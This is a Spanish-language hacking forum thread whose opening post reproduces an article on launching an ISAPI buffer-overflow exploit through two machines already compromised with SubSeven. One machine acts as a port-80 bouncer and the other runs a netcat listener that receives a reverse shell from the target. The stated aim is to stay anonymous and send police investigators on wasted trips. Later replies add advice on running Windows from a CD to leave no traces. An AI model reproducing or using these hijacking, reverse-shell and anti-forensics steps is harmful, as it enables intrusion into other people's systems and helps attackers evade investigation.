Resultados 1 al 9 de 9

Tema: Utilizar Un Shell De Msdos Remoto Para Ocultarse Lanzando Exploits

  1. #1 Utilizar Un Shell De Msdos Remoto Para Ocultarse Lanzando Exploits 
    Avanzado
    Fecha de ingreso
    Jan 2002
    Ubicación
    por ahi
    Mensajes
    328
    Descargas
    0
    Uploads
    0
    me resulto interezante el articulo que reproduzco a continuacion.
    enlace :
    http://www.cieloperros.da.ru/
    http://www.terra.es/personal2/quickb...hellremota.htm



    Algunos usuarios de linux con nulo conocimiento de msdos (quizas crean que windows son solo ventanitas) piensan que es imposible hackear nada sin una shell de unix/linux ,que las shells remotas solo existen en ese mundo...

    Bueno vamos a lanzar el exploit del ISAPI que ya conocemos con anonimato TOTAL usando ademas para despistar mas todavia 2 pcs distintos previamente hackeados y con el subseven metido.

    En el 11.11.11.11 hacemos un bouncer con el subseven asi=

    -en "input port" ------------>pon 80
    -en "output host/ip" ponemos el OBJETIVO (www.hacked.com)
    -en "output port" ---------->pon 80

    Hecho esto nos desconectamos de ella.Esta maquina sera la encargada nada mas de ENVIAR el desbordamiento de buffer que provoca el xploit hacia la victima.

    Ahora nos conectamos a nuestro otro subseven metido en 22.22.22.22

    En esta maquina tendremos subido un NETCAT (nc.exe) tambien.

    Abriremos un shell remoto con el comando del subseven: advanced/appredirect/enable app redirect

    Ahora nos conectamos con el TELNET al puerto 23 de esa maquina 22.22.22.22 y...resultado=

    Microsoft(R) Windows Millennium
    (C)Copyright Microsoft Corp 1981-1999.

    C:\>

    Ahora TODO lo que hagamos es como si fuera nuestra propia maquina,por ello ahora dejaremos escuchando ahi el NETCAT poniendo...: nc -l -p 100 -vv y nos devolvera el mensaje que ya conocemos:

    listening on [any] 100 ...

    Pues ya tenemos todo preparado... Solo falta ejecutar el xploit en NUESTRO PC de esta forma:

    xploit 11.11.11.11 80 22.22.22.22 100

    Hemos enviado el desbordamiento de buffer A TRAVES del 11.11.11.11 hacia www.hacked.com especificando que la vuelta tiene que ir hacia 22.22.22.22, puerto 100... ;-) En la ventana de nuestro TELNET,tenemos ya un shell de www.hacked.com.

    Cuando los estimados agentes de Delitos Informaticos investiguen los logs se frotaran las manos pensando,bien...tenemos 2 ips distintas..seguramente el jaker es la que ha lanzado el ataque..o el que lo ha recibido...pero lamentablemente haran 2 viajes en balde.

    Hacedles un favor y que las dos maquinas esten bien lejos una de la otra...y en sitios chulos,mandadlos a Canarias y a Galicia p.ejm ;-)
    Citar  
     

  2. #2  
    Ex-moderador
    Fecha de ingreso
    Dec 2001
    Ubicación
    BARNA-CITY
    Mensajes
    1.134
    Descargas
    0
    Uploads
    0
    Muy interesante.
    Gracias por la info fermalop.

    Saludos,
    ╟ΚιŦΦ╢
    Citar  
     

  3. #3  
    Avanzado
    Fecha de ingreso
    Dec 2001
    Ubicación
    127.0.0.1
    Mensajes
    1.526
    Descargas
    1
    Uploads
    0
    mmm si parece interesante thx fermalop
    Citar  
     

  4. #4  
    Moderador HH
    Fecha de ingreso
    Mar 2003
    Ubicación
    Galiza
    Mensajes
    3.917
    Descargas
    8
    Uploads
    1
    Pues no estoy de acuerdo con un par de cosillas del articulo, primero resulta que los comandos que utilizan no son para nada de MSDOS, sino que son llamadas a programas Win32 de consola, ademas en los NT no existe nada de MSDOS, tiene un shell parecido, pero es totalmente de 32 bits y puro Win32, en los Win9x si que hay un MSDOS pero solo se utiliza para ejecutar software de este sistema y como cargador de arranque (realmente no son mas que evoluciones del Win 3.1).
    Por lo demas el articulo esta muy bien, gracias fermarlop.
    Lo que no comento es lo de porque se menciona Galicia, que me da mala espina, y si hay que hablar todos tenemos boca.
    Un Saludo
    Citar  
     

  5. #5  
    Avanzado
    Fecha de ingreso
    Jan 2002
    Ubicación
    por ahi
    Mensajes
    328
    Descargas
    0
    Uploads
    0
    Escrito originalmente por gondar_f
    Pues no estoy de acuerdo con un par de cosillas del articulo, primero resulta que los comandos que utilizan no son para nada de MSDOS, sino que son llamadas a programas Win32 de consola, ademas en los NT no existe nada de MSDOS, tiene un shell parecido, pero es totalmente de 32 bits y puro Win32, en los Win9x si que hay un MSDOS pero solo se utiliza para ejecutar software de este sistema y como cargador de arranque (realmente no son mas que evoluciones del Win 3.1).
    Por lo demas el articulo esta muy bien, gracias fermarlop.
    Lo que no comento es lo de porque se menciona Galicia, que me da mala espina, y si hay que hablar todos tenemos boca.
    Un Saludo
    a mi me funciono con un xp ruleando en un CD previamente compilado con Barts PE Builder 3.0.22(
    http://www.mirror.ac.uk/sites/www.nu...uilder3026.zip )
    las intentonas ovbiamente fueron aun servidor propio.
    Citar  
     

  6. #6  
    Avanzado
    Fecha de ingreso
    Oct 2003
    Ubicación
    México, QRO.
    Mensajes
    251
    Descargas
    0
    Uploads
    0
    Vale esta wena la info. y si dices que la provaste y te resulto seguro que es buena solo unas preguntas
    1.- ¿esto se puede hacer con cualquier win?
    2.- ¿Quien fue el diseñador de ese magnifico diseño?
    sale salu2 xD
    Tengo el peor de los cansancios......el cansancio de mi mismo.

    ¦¦lH░▒░₪نקηی۱h٤r₪░▒░Hl¦¦
    Citar  
     

  7. #7  
    Moderador HH
    Fecha de ingreso
    Mar 2003
    Ubicación
    Galiza
    Mensajes
    3.917
    Descargas
    8
    Uploads
    1
    Yo no dije que no fuencionar en XP, todo lo contrario, muchos de esos comandos son de los NT (XP=NT6), aunque algunos tambien estaban disponibles en los 9x. Ademas el XP sigue pudiento ejecutar cierta cantidad de software para DOS, por emulacion, siempre que no utilize el modo real, sino el modo protegido. Lo que dije es que eso no es MSDOS, sino una linea de comandos (al estilo del xterm de linux), y que en Windows hay dos tipos de ejecutables, los de ventaja y los de consola (su apariencia es semejante a los del antiguo MSDOS), pero estos ultimos son completamente de 32 bits, y si no usan ventanas es porque no les hace falta, todo lo contrario, probablemente les restara opciones y los complicara de mala manera, ademas que que se obligaria a que fueran .exe, cuando muchos no lo son, sino que son llamadas a dll.
    Un Saludo
    Citar  
     

  8. #8  
    Ex-moderador
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    1.230
    Descargas
    0
    Uploads
    0
    El del diseño es noseque Pablo. Un controvertido "internauta".
    Recurrimos a la televisión para apagar el cerebro, y a la computadora para encenderlo. (Steve Jobs)

    .:: Pringao Howto ::. el blog de un pringao
    Citar  
     

  9. #9 ... 
    Avanzado
    Fecha de ingreso
    Jan 2002
    Ubicación
    por ahi
    Mensajes
    328
    Descargas
    0
    Uploads
    0
    Escrito originalmente por -=:PüNi§hËr:
    Vale esta wena la info. y si dices que la provaste y te resulto seguro que es buena solo unas preguntas
    1.- ¿esto se puede hacer con cualquier win?
    2.- ¿Quien fue el diseñador de ese magnifico diseño?
    sale salu2 xD
    EN EL LÍMITE DE LA LEY Juan Pablo Corujo, joven detenido en Redondela por hurtar datos de la Agencia Tributaria
    Juan Pablo Corujo, un vendedor de libros en paro, de 29 años, se llevó hace unos días el susto de su vida cuando cuatro policías irrumpieron en su casa, en una aldea de Redondela (Pontevedra), y le espetaron: «¿Has entrado en la Intranet?». La Unidad de Delitos Informáticos temía que el «hacker» hubiese invadido la red interna de Hacienda y luego divulgado los datos de los contribuyentes. Y es que el 19 de mayo bajó a su ordenador la base de datos de clientes de Letras del Tesoro. «No me interesó y las borré. El servidor estaba desprotegido porque los funcionarios eran unos ineptos», dijo al juez, a quien demostró que «cualquier pringadillo puede hacer lo mismo».

    http://www.cieloperros.da.ru/
    el enlace esta en esa paggina sobre las noticias de su detencion-

    otra cosa:
    Barts PE Builder 3.0.22 (http://www.mirror.ac.uk/sites/www.nu...uilder3026.zip)
    es una utilidad que te permite crear un ISO para que quemes en un CD y puedas ejecutar tu XP-2000-NETSERVER desde un CD.esta utilidad me permite usar XP sin disco rigido lo que conviene a la hora de no dejar rastros igual que un knoppix-

    lo de los comandos que habla gondar_f :
    desde que salio MSDOS existe telnet ftp etc lo que habla mas arriba si a eso te refieres, de:
    En el 11.11.11.11 hacemos un bouncer con el subseven asi=

    -en "input port" ------------>pon 80
    -en "output host/ip" ponemos el OBJETIVO (www.hacked.com)
    -en "output port" ---------->pon 80

    O netcat son programas que rulan en otras maquinas que desde MSDOS puedes conectarte con telnet .
    lo unico que usas desde un MSDOS en la maquina local (la que te encuentras) es telnet. las otras maquinas son remotas.

    pagina con comandos MSDOS:
    http://www.computerhope.com/msdos.htm#02
    Última edición por fermarlop; 24-01-2004 a las 16:30
    Citar  
     

Temas similares

  1. crear un .exe con estos archivos para msdos
    Por luisbarbas en el foro GENERAL
    Respuestas: 2
    Último mensaje: 08-02-2009, 15:18
  2. Nuevo Framework para Exploits
    Por j8k6f4v9j en el foro NOTICIAS
    Respuestas: 1
    Último mensaje: 04-09-2008, 15:30
  3. Cliente telnet para msdos
    Por mesias en el foro HARDWARE
    Respuestas: 3
    Último mensaje: 03-09-2003, 00:30
  4. Para poder utilizar el Office
    Por banuelos en el foro LINUX - MAC - OTROS
    Respuestas: 1
    Último mensaje: 13-01-2003, 20:38
  5. Ocultarse!!
    Por khronos en el foro INTRUSION
    Respuestas: 9
    Último mensaje: 20-09-2002, 21:52

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •